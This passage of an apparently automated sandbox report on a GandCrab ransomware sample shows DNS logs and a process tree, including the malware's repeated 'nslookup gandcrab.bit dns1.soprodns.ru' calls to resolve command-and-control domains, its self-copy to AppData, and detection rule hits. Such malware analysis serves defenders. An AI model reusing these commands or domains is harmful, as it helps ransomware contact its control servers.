                                    Sep 1, 2022 00:03:29.401654959 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:29.423216105 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:30.033303976 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:30.819206953 CEST8.8.8.8192.168.2.30x83d5Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:30.911178112 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:31.996062040 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.016911030 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:32.055161953 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.077513933 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:32.328344107 CEST8.8.8.8192.168.2.30x14b6Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.360487938 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:32.381845951 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.402843952 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:32.423881054 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:32.444027901 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:33.662503004 CEST8.8.8.8192.168.2.30xedcaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.694170952 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:33.714600086 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.735584974 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:33.755711079 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:33.774130106 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:34.005925894 CEST8.8.8.8192.168.2.30xa3fcName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:34.032443047 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:34.052963972 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:34.075452089 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:34.093806982 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:34.114725113 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:34.727765083 CEST8.8.8.8192.168.2.30xedcaName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:35.952977896 CEST8.8.8.8192.168.2.30xbc05Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:35.979208946 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:36.000792027 CEST8.8.8.8192.168.2.30x2Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:36.022969007 CEST8.8.8.8192.168.2.30x3Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:36.044903994 CEST8.8.8.8192.168.2.30x4Name error (3)nomoreransom.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:36.066387892 CEST8.8.8.8192.168.2.30x5Name error (3)nomoreransom.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:37.278584003 CEST8.8.8.8192.168.2.30x25c4Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.308661938 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:37.330910921 CEST8.8.8.8192.168.2.30x2Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.351093054 CEST8.8.8.8192.168.2.30x3Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:37.372787952 CEST8.8.8.8192.168.2.30x4Name error (3)emsisoft.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:37.393057108 CEST8.8.8.8192.168.2.30x5Name error (3)emsisoft.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:38.649069071 CEST8.8.8.8192.168.2.30x8bcName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.677830935 CEST8.8.8.8192.168.2.30x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                    Sep 1, 2022 00:03:38.699517965 CEST8.8.8.8192.168.2.30x2Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.719789982 CEST8.8.8.8192.168.2.30x3Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:38.740737915 CEST8.8.8.8192.168.2.30x4Name error (3)gandcrab.bitnonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:38.761935949 CEST8.8.8.8192.168.2.30x5Name error (3)gandcrab.bitnonenone28IN (0x0001)
                                    Sep 1, 2022 00:03:39.094896078 CEST8.8.8.8192.168.2.30xbc05Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:40.677587986 CEST8.8.8.8192.168.2.30x8bcName error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)
                                    Sep 1, 2022 00:03:41.002669096 CEST8.8.8.8192.168.2.30x25c4Name error (3)dns1.soprodns.runonenoneA (IP address)IN (0x0001)

                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:1
                                    Start time:00:01:12
                                    Start date:01/09/2022
                                    Path:C:\Users\user\Desktop\9gkAKTWOXp.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\9gkAKTWOXp.exe"
                                    Imagebase:0x400000
                                    File size:75264 bytes
                                    MD5 hash:74E135B472B7496B371CE3BA3ACFEEA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    Reputation:low

                                    Target ID:5
                                    Start time:00:01:21
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:6
                                    Start time:00:01:22
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:7
                                    Start time:00:01:23
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:8
                                    Start time:00:01:23
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:9
                                    Start time:00:01:24
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:10
                                    Start time:00:01:25
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:12
                                    Start time:00:01:26
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:13
                                    Start time:00:01:27
                                    Start date:01/09/2022
                                    Path:C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
                                    Imagebase:0x400000
                                    File size:75264 bytes
                                    MD5 hash:551DA842D854798E9D42602EB420BD96
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Florian Roth
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Joe Security
                                    • Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: kevoreilly
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low

                                    Target ID:14
                                    Start time:00:01:31
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:16
                                    Start time:00:01:33
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:18
                                    Start time:00:01:33
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:21
                                    Start time:00:01:35
                                    Start date:01/09/2022
                                    Path:C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
                                    Imagebase:0x400000
                                    File size:75264 bytes
                                    MD5 hash:551DA842D854798E9D42602EB420BD96
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security

                                    Target ID:24
                                    Start time:00:01:37
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:25
                                    Start time:00:01:37
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:26
                                    Start time:00:01:38
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:27
                                    Start time:00:01:39
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:29
                                    Start time:00:01:40
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:30
                                    Start time:00:01:40
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff651c80000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:31
                                    Start time:00:01:41
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:32
                                    Start time:00:01:42
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:33
                                    Start time:00:01:42
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:34
                                    Start time:00:01:43
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:35
                                    Start time:00:01:44
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:36
                                    Start time:00:01:45
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:37
                                    Start time:00:01:45
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:39
                                    Start time:00:01:46
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:41
                                    Start time:00:01:50
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:42
                                    Start time:00:01:50
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:43
                                    Start time:00:01:52
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:44
                                    Start time:00:01:52
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:45
                                    Start time:00:01:53
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:46
                                    Start time:00:01:54
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:47
                                    Start time:00:01:56
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:48
                                    Start time:00:01:57
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75a330000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:49
                                    Start time:00:01:58
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:50
                                    Start time:00:01:58
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:51
                                    Start time:00:01:59
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:52
                                    Start time:00:01:59
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:53
                                    Start time:00:02:00
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup nomoreransom.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:54
                                    Start time:00:02:01
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:55
                                    Start time:00:02:01
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup emsisoft.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:56
                                    Start time:00:02:02
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:57
                                    Start time:00:02:03
                                    Start date:01/09/2022
                                    Path:C:\Windows\SysWOW64\nslookup.exe
                                    Wow64 process (32bit):true
                                    Commandline:nslookup gandcrab.bit dns1.soprodns.ru
                                    Imagebase:0x2c0000
                                    File size:78336 bytes
                                    MD5 hash:8E82529D1475D67615ADCB4E1B8F4EEC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:58
                                    Start time:00:02:04
                                    Start date:01/09/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
